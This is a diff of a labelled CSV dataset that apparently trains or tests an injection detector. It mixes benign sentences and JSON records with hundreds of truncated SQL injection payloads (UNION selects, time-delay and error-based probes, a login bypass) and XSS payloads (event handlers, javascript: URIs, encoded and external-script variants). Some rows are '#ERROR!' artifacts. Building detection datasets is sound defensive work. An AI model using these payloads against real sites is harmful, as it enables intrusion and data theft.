select luwn where 1214 = 1214 union all sele,2,SQLi,13657 +1' ) ) ) and 6510 = ( select count ( * ) from sysu,2,SQLi,13149 +"Once you are there, select the Device Performance ",0,normal,25832 +<dialog id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,4618 +"-4798%' ) ) ) union all select 3330,3330,3330#",2,SQLi,15815 +"<optgroup ondblclick=""alert(1)"">test</optgroup>",1,XSS,3324 +You can learn more at about the Select Committee h,0,normal,25093 +Select a comfortable pillow.,0,normal,22633 +1%' ) or ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,22435 +"<bdi draggable=""true"" ondragend=""alert(1)"">test</b",1,XSS,3314 +Select with enthusiasm.,0,normal,24442 +Select the best recipe.,0,normal,24341 +Select reject.,0,normal,24578 +"{""id"":null,""firstName"":"""",""lastName"":"""",""specialti",0,normal,26775 +1'|| ( select 'cjwp' where 8681 = 8681 or 8466 = b,2,SQLi,12746 +"end and ""xouo"" like ""xouo",2,SQLi,12874 +"select * from users where id = '1' union select \,",2,SQLi,11598 +<marquee onpointerover=alert(1)>XSS</marquee>,1,XSS,8213 +select * from users where id = 1 <@.$ or 1 = 1 -- ,2,SQLi,11434 +"-1772 ) ) or 1570 = convert ( int, ( select char (",2,SQLi,20015 +"1%"" ) or 7427 = dbms_pipe.receive_message ( chr ( ",2,SQLi,20016 +"-5728 ) where 8663 = 8663 union all select 8663,86",2,SQLi,17743 +-5067' ) ) or 5903 = ( 'qqpjq'|| ( select case 590,2,SQLi,21389 +1 ) ) as oqui where 3368 = 3368 order by 1--,2,SQLi,16021 +"<html><BODY><?xml:namespace prefix=""t"" ns=""urn:sch",1,XSS,1519 +"Click ""Select all,"" and then click the icon again ",0,normal,26281 +1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'wvzb' = ,2,SQLi,22210 +<multicol id=x tabindex=1 onfocusin=alert(1)></mul,1,XSS,4495 +"1%"" ) ) or 2367 = ( select count ( * ) from rdb$fi",2,SQLi,22057 +"<caption draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,3114 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,16569 +-5500' ) order by 1--,2,SQLi,16297 +select * from users where id = 1 + ( $+ ) or 1 = 1,2,SQLi,11837 +"<link onkeypress=""alert(1)"" contenteditable>test</",1,XSS,2868 +</style &#32;><script &#32; :-(>/**/alert(document,1,XSS,856 +The number of these select members is small in com,0,normal,25404 +"<strike onclick=""alert(1)"">test</strike>",1,XSS,4915 +"1"" ) as idwa where 2545 = 2545 or 7552 = ( select ",2,SQLi,13863 +"<td ondblclick=""alert(1)"">test</td>",1,XSS,5466 +1 and 3754 = ( select upper ( xmltype ( chr ( 60 ),2,SQLi,18187 +Update your profile.,0,normal,22763 +"<title onmousemove=""alert(1)"">test</title>",1,XSS,5485 +1 ) where 7680 = 7680 and 7756 = dbms_utility.sqli,2,SQLi,12608 +To save a spreadsheet select File Save or click th,0,normal,25259 +"1%"" ) ) ) or ( select * from ( select ( sleep ( 5 ",2,SQLi,18355 +"<area onmouseenter=""alert(1)"">test</area>",1,XSS,3831 +Select your discover.,0,normal,24987 +<i onblur=alert(1) tabindex=1 id=x></i><input auto,1,XSS,4700 +1 ) ) and 9254 = ( select count ( * ) from rdb$fie,2,SQLi,15203 +<em id=x tabindex=1 ondeactivate=alert(1)></em><in,1,XSS,4990 +"<iframe onmouseover=""alert(1)"">test</iframe>",1,XSS,4653 +select ( case when ( 8233 = 1074 ) then 8233 else ,2,SQLi,17546 +Randomly select a wedding song.,0,normal,24378 +1'+ ( select jley where 3581 = 3581 and 2388 = ben,2,SQLi,17712 +ORDER BY 18#,2,SQLi,10291 +1'|| ( select 'owzs' where 1475 = 1475 union all s,2,SQLi,21480 +-6500' ) ) or ( 8459 = 8459 ) *4906 and ( ( 'padu',2,SQLi,21183 +"<dir onpaste=""alert(1)"" contenteditable>test</dir>",1,XSS,6799 +"<fieldset onbeforecopy=""alert(1)"" contenteditable>",1,XSS,5811 "{""id"":null,""firstName"":""Valerie"",""lastName"":""Goh"",",0,normal,27437 -1 ) as qort where 1554 = 1554,2,SQLi,17840 -"<b onmouseover=""alert(1)"">test</b>",1,XSS,5411 -"<style>@keyframes x{}</style><rt style=""animation-",1,XSS,8334 -"<strike onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,2801 -<h1/onclick=alert(1)>a//INJECTX,1,XSS,9837 -ORDER BY 29,2,SQLi,10333 -"1"" ) ) and make_set ( 1167 = 5027,5027 ) and ( ( """,2,SQLi,12729 -Select a scent for the candle.,0,normal,24001 -For investors who want to take advantage of Goldma,0,normal,26177 -1'+ ( select 'ymgm' where 8204 = 8204 and sleep ( ,2,SQLi,13779 -"<samp oncopy=""alert(1)"" contenteditable>test</samp",1,XSS,7816 -<figure onpointerleave=alert(1)>XSS</figure>,1,XSS,4379 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8922 -1'+ ( select pepf where 5071 = 5071 or 2367 = ( se,2,SQLi,21260 -"<fieldset onbeforecut=""alert(1)"" contenteditable>t",1,XSS,6717 -1 ) where 4992 = 4992,2,SQLi,20121 -"<picture oncopy=""alert(1)"" contenteditable>test</p",1,XSS,2262 -"<legend draggable=""true"" ondrag=""alert(1)"">test</l",1,XSS,7430 -"1' ) ) and row ( 6237,7469 ) > ( select count ( * ",2,SQLi,20390 -"<set attributeName=""onmouseover"" to=""alert(89)""/>",1,XSS,9303 -"{""id"":null,""name"":""somebody maybe anywhere""}",0,normal,27045 -) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11191 -"-8655 ) where 3910 = 3910 union all select 3910,39",2,SQLi,18779 -"1"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch",2,SQLi,17570 -<bgsound id=x tabindex=1 ondeactivate=alert(1)></b,1,XSS,2008 +1 ) where 5418 = 5418 union all select null--,2,SQLi,17842 +"<aside draggable=""true"" ondrag=""alert(1)"">test</as",1,XSS,5413 +"<IMG DYNSRC=""javascript:alert('')"">",1,XSS,8336 +"<del onclick=""alert(1)"">test</del>",1,XSS,2802 +"<video><source onerror=""javascript:alert(1)"">//INJ",1,XSS,9839 +ORDER BY 31337,2,SQLi,10335 +"1%"" ) or 2633 = dbms_pipe.receive_message ( chr ( ",2,SQLi,12731 +Select the perfect outfit for the event.,0,normal,24003 +"For nested menus, you just keep pushing to select.",0,normal,26174 +1'+ ( select llcl where 8188 = 8188 and 2716 = ( s,2,SQLi,13781 +"<base ondblclick=""alert(1)"">test</base>",1,XSS,7818 +<link onfocusin=alert(1) id=x tabindex=1 style=dis,1,XSS,4381 +"<canvas onmousedown=""alert(1)"">test</canvas>",1,XSS,8924 +"1' ) where 6081 = 6081 union all select null,null,",2,SQLi,21262 +"<meter onmousemove=""alert(1)"">test</meter>",1,XSS,6719 +"1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a",2,SQLi,20123 +<spacer id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,2263 +<dir onpointerup=alert(1)>XSS</dir>,1,XSS,7432 +1 ) ) ) order by 1--,2,SQLi,20392 +"<set attributeName=""xlink:href"" begin=""accessKey(b",1,XSS,9305 +Everett was a member of nearly all the most import,0,normal,26209 +))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) ,2,SQLi,11193 +-5569' ) as cjaf where 3753 = 3753 union all selec,2,SQLi,18781 +"1' ) ) and make_set ( 1002 = 3556,3556 ) and ( ( '",2,SQLi,17572 +"<marquee onkeyup=""alert(1)"" contenteditable>test</",1,XSS,2009 "<a href=""&#0000106avascript:alert(1)"">XSS</a>",1,XSS,194 -"1 ) and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,13804 -Help your tween or teen select age-appropriate sou,0,normal,26105 -<video onpointerleave=alert(1)>XSS</video>,1,XSS,8771 -"-2602' union all select 5715,5715,5715,5715,5715,5",2,SQLi,16301 -"1"" ) ) ) or 7417 = ( select count ( * ) from sysib",2,SQLi,21910 +"1 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13806 +Here's how I select my seat every time I fly.,0,normal,26102 +"<kbd onmouseover=""alert(1)"">test</kbd>",1,XSS,8773 +"iif ( 4436 = 8910,1,1/0 )",2,SQLi,16303 +1' ) as bxae where 4143 = 4143 or updatexml ( 1808,2,SQLi,21912 "<HTML xmlns:xss><?import namespace=""xss"" implement",1,XSS,772 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10588 -"1"" ) ) or ( select * from ( select ( sleep ( 5 ) )",2,SQLi,17863 -1 ) where 2940 = 2940,2,SQLi,18231 -1 ) as ghew where 6441 = 6441 union all select nul,2,SQLi,12467 -1' ) as pghp where 9086 = 9086,2,SQLi,20125 -Select deal.,0,normal,24767 -1' ) as pudv where 2609 = 2609,2,SQLi,14869 -"1 ) where 7815 = 7815 union all select null,null,n",2,SQLi,14568 -"1"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x71",2,SQLi,16790 -"{""id"":null,""name"":""Minun""}",0,normal,26994 -"{""id"":null,""firstName"":""Wong"",""lastName"":""Qun Jie""",0,normal,27224 -and 1 in (select var from temp)--,2,SQLi,10089 -"1%' ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ",2,SQLi,16911 -<body onpointerdown=alert(1)>XSS</body>,1,XSS,6318 -select * from users where id = 1 or 1<@ = 1 union ,2,SQLi,11852 -"<br onclick=""alert(1)"">test</br>",1,XSS,6582 -&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;,1,XSS,1448 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10590 +"-5732' ) union all select 7614,7614,7614,7614--",2,SQLi,17865 +-4184' ) ) ) or 2579 = 4654#,2,SQLi,18233 +1' order by 1#,2,SQLi,12469 +"1, ( convert ( int, ( select char ( 113 ) +char ( ",2,SQLi,20127 +Select negotiate.,0,normal,24764 +"1%' and elt ( 7619 = 1489,1489 ) and '%' = '",2,SQLi,14871 +"1"" ) as advz where 5166 = 5166 or 8156 = ( select ",2,SQLi,14570 +1%' ) or exp ( ~ ( select * from ( select concat (,2,SQLi,16792 +"{""id"":null,""firstName"":""April"",""lastName"":""Kwan"",""",0,normal,26991 +"{""id"":null,""name"":""Blitzle""}",0,normal,27222 +or 'text' = n'text',2,SQLi,10091 +"-5161%"" or ( 1437 = 4869 ) *4869 and ""%"" = """,2,SQLi,16913 +"<style>@keyframes x{}</style><listing style=""anima",1,XSS,6320 +select * from users where id = 1<@<@ union select ,2,SQLi,11854 +<i onpointerout=alert(1)>XSS</i>,1,XSS,6584 +&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html ,1,XSS,1449 "-eval(window['pro'%2B'mpt'](8)"")-""",1,XSS,343 -Where's the perfect spot to capture memories?,0,normal,23853 --4323' ) ) or 6968 = 1393,2,SQLi,13320 -and SELECT pg_sleep(5);,2,SQLi,11329 -1%' and 2716 = ( select count ( * ) from sysusers ,2,SQLi,17112 -"1%"" union all select null,null--",2,SQLi,20962 -<eval>new ActiveXObject(&apos;htmlfile&apos;).pare,1,XSS,9169 -"By the volume slider for MIDI there will be a "" Se",0,normal,26298 --4055' ) ) as yoez where 3816 = 3816 or ( 8459 = 8,2,SQLi,19901 -<script onpointerout=alert(1)>XSS</script>,1,XSS,7369 -"<video onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,2045 -"<style>@keyframes x{}</style><datalist style=""anim",1,XSS,7157 --3582' ) or 6872 = 6872 and ( 'gyfj' = 'gyfj,2,SQLi,16289 -"<style>@keyframes x{}</style><embed style=""animati",1,XSS,7852 -)) or sleep(__TIME__)=',2,SQLi,10179 -"-7868"" ) ) or 9323 = 9323#",2,SQLi,12133 -"1"" or updatexml ( 1808,concat ( 0x2e,0x7171706a71,",2,SQLi,13616 -1 ) ) as syot where 1199 = 1199,2,SQLi,17733 -"-3638"" union all select 4394,4394,4394,4394,4394,4",2,SQLi,17045 -"<LAYER SRC=""javascript:document.vulnerable=true;"">",1,XSS,1493 +Where did you get that delicious dessert from?,0,normal,23855 +-5350 ) ) or 9323 = 9323#,2,SQLi,13322 +or SELECT pg_sleep(5);,2,SQLi,11331 +"-9557%"" ) ) ) or 4747 = dbms_utility.sqlid_to_sqlh",2,SQLi,17114 +1%' or 8156 = ( select count ( * ) from generate_s,2,SQLi,20964 +"<foreignObject xlink:href=""data:text/xml,%3Cscript",1,XSS,9171 +"Cameron Forni, who created Select brand in 2015, w",0,normal,26295 +"1%"" ) ) ) or 5286 = ( select count ( * ) from all_",2,SQLi,19903 +"<frame onmousedown=""alert(1)"">test</frame>",1,XSS,7371 +"<style>@keyframes x{}</style><rb style=""animation-",1,XSS,2046 +"<area onpaste=""alert(1)"" contenteditable>test</are",1,XSS,7159 +1' ) ) and 8407 = ( select count ( * ) from genera,2,SQLi,16291 +"<object draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,7854 +or 1 in (select @@version)--,2,SQLi,10181 +"1"" where 2462 = 2462 and 2716 = ( select count ( *",2,SQLi,12135 +"1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,13618 +"1"" ) or ( select * from ( select ( sleep ( 5 ) ) )",2,SQLi,17735 +"-7485%' ) ) ) union all select 1303,1303,1303,1303",2,SQLi,17047 +"<link REL=""stylesheet"" HREF=""javascript:document.v",1,XSS,1494 <STYLE>a{background:url('s1' 's2)}@import javascri,1,XSS,779 -1'+ ( select vfmy where 5711 = 5711,2,SQLi,21539 -"or """,2,SQLi,9886 -"-4606"" ) as elek where 8261 = 8261 or 8571 = 8571-",2,SQLi,18864 -"<script>Object.defineProperties(window, {Safe: {va",1,XSS,9278 -<tbody id=x tabindex=1 onfocusin=alert(1)></tbody>,1,XSS,2525 -Where's the villa?,0,normal,23568 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,21175 -"<template onkeyup=""alert(1)"" contenteditable>test<",1,XSS,5375 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,19583 -1'|| ( select 'lxyu' from dual where 5789 = 5789 u,2,SQLi,22102 -Also available at Redbox and On Demand through sel,0,normal,26389 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,16233 -"-7812' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr",2,SQLi,14850 -1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,17372 -"<p onmouseup=""alert(1)"">test</p>",1,XSS,8260 -Select your view.,0,normal,24829 +1' ) ) ) and 2006 = 2006,2,SQLi,21541 +"or ""^",2,SQLi,9888 +"-1591 where 3291 = 3291 union all select 3291,3291",2,SQLi,18866 +<script>alert(/XSS”)</script>,1,XSS,9280 +"<nav onkeyup=""alert(1)"" contenteditable>test</nav>",1,XSS,2526 +Where's the manor?,0,normal,23570 +1 ) as lhie where 4631 = 4631 union all select nul,2,SQLi,21177 +"<style>@keyframes x{}</style><strong style=""animat",1,XSS,5377 +"1%' union all select null,null,null,null#",2,SQLi,19585 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,22104 +Also streaming for select public libraries and uni,0,normal,26386 +1 ) and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,16235 +-7279 ) or 9898 = 9963 and ( 1481 = 1481,2,SQLi,14852 +"1 union all select null,null,null,null,null,null,n",2,SQLi,17374 +<table onpointerdown=alert(1)>XSS</table>,1,XSS,8262 +Select your car.,0,normal,24826 <style>:target {color:red;}</style><xss id=x style,1,XSS,41 -"RLIKE SLEEP(5) AND 1337"" LIKE ""1337",2,SQLi,11241 -"1%"" ) ) ) and 9660 = ( select count ( * ) from all",2,SQLi,18147 -"To do this, you simply select your preferred CPU p",0,normal,25271 -"-3037 ) where 9024 = 9024 union all select 9024,90",2,SQLi,14425 -select * from users where id = 1 union select @ 1a,2,SQLi,11640 -<svg><basefont onload=alert(1)></basefont>,1,XSS,6817 -Select the ideal spot.,0,normal,24291 -Select your triumph.,0,normal,25009 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10705 -select sleep ( 5 ) and ( ( ( 'iwwa' like 'iwwa,2,SQLi,19108 -1' ) ) and 8312 = dbms_pipe.receive_message ( chr ,2,SQLi,14141 -&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6,1,XSS,1461 -Select Manage Profiles from the menu and select th,0,normal,25620 -<image3 onpointerout=alert(1)>XSS</image3>,1,XSS,4494 -Where's the theater?,0,normal,23540 -They'll select the leader.,0,normal,24284 -1' where 2332 = 2332 or 9643 = ( select count ( * ,2,SQLi,13075 -"1%' ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ",2,SQLi,17916 -1' or 8315 = ( select count ( * ) from sysibm.syst,2,SQLi,13687 -1' where 1031 = 1031 or char ( 68 ) ||char ( 69 ) ,2,SQLi,13948 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,11003 -1 ) rlike sleep ( 5 ) and ( 5724 = 5724,2,SQLi,15433 -<fieldset onpointerup=alert(1)>XSS</fieldset>,1,XSS,7231 -"1 ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a47",2,SQLi,15687 -"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000",2,SQLi,10413 -"<menu onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5076 -"1', ( select ( case when ( 1570 = 1570 ) then ( se",2,SQLi,21779 -<button onOffline=javascript:alert(1)>,1,XSS,9642 -"Select the page on which you want to move an item,",0,normal,25588 -"The grand-duke, however, continued to pay him his ",0,normal,25436 -Select a book for your imagination.,0,normal,24174 -1,0,normal,26725 -"<html draggable=""true"" ondrag=""alert(1)"">test</htm",1,XSS,4089 -1 and ( 5369 = 8325 ) *8325# psze,2,SQLi,18352 -"1' where 4701 = 4701 and row ( 6237,7469 ) > ( sel",2,SQLi,21142 -It is for you to select a person who you wish to o,0,normal,25967 -"-7565' ) ) union all select 7745,7745,7745,7745,77",2,SQLi,14950 -<kbd id=x tabindex=1 onfocusin=alert(1)></kbd>,1,XSS,4250 -Where to optimize queries?,0,normal,23384 -1%' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( ,2,SQLi,16808 -select,0,normal,26626 -admin' or ',2,SQLi,10097 -"{""id"":null,""name"":""Golemon""}",0,normal,26945 -"-8487' ) where 9655 = 9655 union all select 9655,9",2,SQLi,22011 -"1"" ) as ztkr where 1532 = 1532",2,SQLi,12110 -<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><,1,XSS,6143 -<head onfocusout=alert(1) tabindex=1 id=x></head><,1,XSS,5662 --2896' ) ) as wisk where 1030 = 1030 union all sel,2,SQLi,13971 -"1"" where 7796 = 7796",2,SQLi,15038 -"</math>//[""'`-->]]>]</div>",1,XSS,9032 -"1"" where 2235 = 2235 union all select null,null,nu",2,SQLi,20981 -<var onpointerenter=alert(1)>XSS</var>,1,XSS,2660 +WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11243 +1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ),2,SQLi,18149 +To fill vacancies parliament must name six persons,0,normal,25268 +"1 ) ) union all select null,null,null,null--",2,SQLi,14427 +select * from users where id = '1' or ( \. ) = 1 u,2,SQLi,11642 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6819 +1,0,normal,26691 +Subcontracting firms are not able to select for fi,0,normal,25515 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10707 +"1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a",2,SQLi,19110 +"-7233"" ) where 7574 = 7574 or 5821 = 3288",2,SQLi,14143 +&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&l,1,XSS,1462 +"Select one color for the walls, and use the second",0,normal,25617 +al\u0065rt(1),1,XSS,4496 +Where's the cafe?,0,normal,23542 +Select your dream destination.,0,normal,24281 +1' where 8128 = 8128,2,SQLi,13077 +"1' ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544",2,SQLi,17918 +1' ) ) ) and ( select * from ( select ( sleep ( 5 ,2,SQLi,13689 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13950 +#ERROR!,2,SQLi,11005 +-3166'|| ( select 'mtan' from dual where 9420 = 94,2,SQLi,15435 +<style>:target {color:red;}</style><hr id=x style=,1,XSS,7233 +1 ) ) or 7552 = ( select count ( * ) from rdb$fiel,2,SQLi,15689 +"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000",2,SQLi,10415 +"<html onmouseover=""alert(1)"">test</html>",1,XSS,5078 +"-5963"" or 9323 = 9323#",2,SQLi,21781 +<button onOutOfSync=javascript:alert(1)>,1,XSS,9644 +Select the recording option in your toolbar or by ,0,normal,25585 +The Health Care Select Sector SPDR (XLV) fell 2 pe,0,normal,25433 +Select your favorite color from the palette.,0,normal,24176 +1,0,normal,26722 +"<spacer onmousemove=""alert(1)"">test</spacer>",1,XSS,4091 +1'+ ( select 'jfir' where 7814 = 7814 and ( select,2,SQLi,18354 +"1 ) or row ( 1045,7562 ) > ( select count ( * ) ,c",2,SQLi,21144 +It is in select theaters in New York and Los Angel,0,normal,25964 +"1' ) and make_set ( 4551 = 6487,6487 ) and ( 'jnqa",2,SQLi,14952 +"<dl ondblclick=""alert(1)"">test</dl>",1,XSS,4252 +Where's the data located?,0,normal,23386 +1%' ) ) ) and ( select * from ( select ( sleep ( 5,2,SQLi,16810 +select,0,normal,26623 +"1) or benchmark(10000000,MD5(1))#",2,SQLi,10099 +"{""id"":null,""name"":""Seadramon""}",0,normal,26942 +"-4033' ) ) or 1570 = convert ( int, ( select char ",2,SQLi,22013 +1' ) ) ) or exp ( ~ ( select * from ( select conca,2,SQLi,12112 +"<center onmousedown=""alert(1)"">test</center>",1,XSS,6145 +"<bgsound onmouseup=""alert(1)"">test</bgsound>",1,XSS,5664 +1%' and 8407 = ( select count ( * ) from generate_,2,SQLi,13973 +"1' ) and row ( 6237,7469 ) > ( select count ( * ) ",2,SQLi,15040 +"</style>//[""'`-->]]>]</div>",1,XSS,9034 +-6086' ) ) or ( 6719 = 7280 ) *7280 and ( ( 'ozbj',2,SQLi,20983 +"<noscript onpaste=""alert(1)"" contenteditable>test<",1,XSS,2661 <xss class=progress-bar-animated onanimationstart=,1,XSS,142 -"<blink oncontextmenu=""alert(1)"">test</blink>",1,XSS,2598 -<style>@keyframes slidein {}</style><template styl,1,XSS,6702 -"1"" ) ) as tmpz where 7224 = 7224 and make_set ( 35",2,SQLi,15224 -"1"" ) ( select ( case when ( 4587 = 4587 ) then reg",2,SQLi,17762 -"-6815 ) where 2498 = 2498 union all select 2498,24",2,SQLi,20059 +"<details draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,2599 +"<dl draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,6704 +"1"" where 1132 = 1132 or 6793 = ( select 6793 from ",2,SQLi,15226 +"-1908"" ) where 6420 = 6420 union all select 6420,6",2,SQLi,17764 +1'+ ( select smze where 5616 = 5616,2,SQLi,20061 "{""id"":null,""name"":""Vampire Bat""}",0,normal,27478 -Order a vegetarian meal.,0,normal,22747 -<big id=x tabindex=1 onfocus=alert(1)></big>,1,XSS,7419 -1' ) where 6774 = 6774 or 5286 = ( select count ( ,2,SQLi,21126 -"1"" ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ",2,SQLi,17523 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10450 -I need to decide where to have lunch today.,0,normal,23759 -1' ) ) as ijyi where 3694 = 3694 ( select ( case w,2,SQLi,18172 -if ( 8284 = 6171 ) select 8284 else drop function ,2,SQLi,12131 -Select your date.,0,normal,24816 -1 where 2278 = 2278 and ( select 9067 from ( selec,2,SQLi,21031 -Can you help me decide where to take a weekend tri,0,normal,23953 -"1"" or sleep ( 5 )",2,SQLi,16844 -select version();,2,SQLi,22500 -"-1647' ) ) union all select 3030,3030,3030,3030,30",2,SQLi,16014 -"<colgroup onmouseleave=""alert(1)"">test</colgroup>",1,XSS,8180 -select * from users where id = 1 or $ . = 1 union ,2,SQLi,11566 -1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ),2,SQLi,17333 -"javascript:alert()//'//""//`//></a></option></selec",1,XSS,9529 -"<time onmouseup=""alert(1)"">test</time>",1,XSS,6371 -<style>:target {color: red;}</style><plaintext id=,1,XSS,4629 -Where's the best place to take a yoga class?,0,normal,23743 -"1"" ) where 3826 = 3826",2,SQLi,14479 --9875' ) or ( 8459 = 8459 ) *4906 and ( 'mrxw' = ',2,SQLi,22310 -"-6363"" ) where 4043 = 4043 union all select 4043,4",2,SQLi,22425 +Update your phone contacts.,0,normal,22749 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7421 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,21128 +1' ) where 3703 = 3703 and 2716 = ( select count (,2,SQLi,17525 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10452 +Let's explore where the river flows from.,0,normal,23761 +1%' ) ) or sleep ( 5 ) and ( ( '%' = ',2,SQLi,18174 +"-7868"" ) ) or 9323 = 9323#",2,SQLi,12133 +Select your style.,0,normal,24813 +1%' ) ) and 7160 = 7249--,2,SQLi,21033 +I want to select a movie for our movie night.,0,normal,23955 +"1' ) ) ) and make_set ( 7539 = 3946,3946 ) and ( (",2,SQLi,16846 +select current_user;,2,SQLi,22502 +1' ) ( select ( case when ( 4587 = 4587 ) then reg,2,SQLi,16016 +<button onpointermove=alert(1)>XSS</button>,1,XSS,8182 +select * from users where id = 1 +$ . union select,2,SQLi,11568 +1'|| ( select 'xglm' from dual where 3556 = 3556 o,2,SQLi,17335 +"javascript:alert/*`/*\/*'/*\""/*""/**/(alert())// al",1,XSS,9531 +"<rb onmouseup=""alert(1)"">test</rb>",1,XSS,6373 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4631 +She picked up some groceries from the market.,0,normal,23745 +"1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( ",2,SQLi,14481 +"1"" ) where 2473 = 2473 and make_set ( 6118 = 7684,",2,SQLi,22312 +"-2898"" where 3301 = 3301 union all select 3301,330",2,SQLi,22427 "<a href=""javas\x0Ccript:javascript:alert(1)"" id=""f",1,XSS,442 -Join hike.,0,normal,23044 -><script+src=https://mempf.yahoo.co.jp/offer?posit,1,XSS,9795 -<D3/OnMouSEenTer=[2].find(confirm)>z,1,XSS,9047 -"<area onmouseenter=""alert(1)"">test</area>",1,XSS,3831 -"{""id"":16436,""name"":""jmeter test <DO NOT DELETE>""}",0,normal,26799 -#ERROR!,2,SQLi,22529 -Berg explained so clearly why he wanted to collect,0,normal,26324 -"<textarea oncontextmenu=""alert(1)"">test</textarea>",1,XSS,6345 -Up to 40% off Select Edible Spring Gardening and H,0,normal,25211 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1959 +Sort beads.,0,normal,23046 +><script+src=https://www.aol.com/amp-proxy/api/fin,1,XSS,9797 +"<IMG SRC=""mocha:[code]"">",1,XSS,9049 +"<frameset onmouseout=""alert(1)"">test</frameset>",1,XSS,3833 +"{""id"":8430,""firstName"":""jmeter"",""lastName"":""use in",0,normal,26796 +#ERROR!,2,SQLi,22531 +Bible - Visit your local Christian bookstore and s,0,normal,26321 +"<button ondblclick=""alert(1)"">test</button>",1,XSS,6347 +Up to 40% off select smart and electronic door loc,0,normal,25208 +"<strike onmouseenter=""alert(1)"">test</strike>",1,XSS,1960 "<svg><use href=""data:image/svg+xml,<svg id='x' xml",1,XSS,156 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10488 -"So after six years, the brand is introducing Birch",0,normal,25541 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4579 -"&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&",1,XSS,1090 -"1 union all select null,null,null,null,null,null,n",2,SQLi,22434 -"1"" ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 )",2,SQLi,12577 -"<div id=""134""><xmp>",1,XSS,9123 -"<q onbeforecopy=""alert(1)"" contenteditable>test</q",1,XSS,7951 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11102 -1%' and 9198 = 9198--,2,SQLi,18059 -end,0,normal,23148 -There are two-hour tours on select dates throughou,0,normal,25332 -"<del onmouseout=""alert(1)"">test</del>",1,XSS,6417 -"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,16022 -<br/><hr/>feed:feed:javAscript:javAscript:feed:ale,1,XSS,9088 -declare @s varchar ( 200 ) select @s = 0x73656c6 .,2,SQLi,11440 -"-8557 or 1 group by concat ( 0x7171706a71, ( selec",2,SQLi,18711 -<plaintext onblur=alert(1) tabindex=1 id=x></plain,1,XSS,7097 -&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#,1,XSS,1099 -"\"";alert('');//",1,XSS,5434 -"1%"" ) or 4915 = ( select count ( * ) from domain.d",2,SQLi,13231 -"<style>@keyframes x{}</style><noframes style=""anim",1,XSS,6451 -"1"" ) ) and 6537 = dbms_pipe.receive_message ( chr ",2,SQLi,12329 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10786 --1257' ) order by 1#,2,SQLi,18100 --8028%' ) ) ) or 5042 = 5214,2,SQLi,20216 -Create a unique sculpture.,0,normal,22684 -"<style>@keyframes slidein {}</style><bdo style=""an",1,XSS,3349 -"<menu 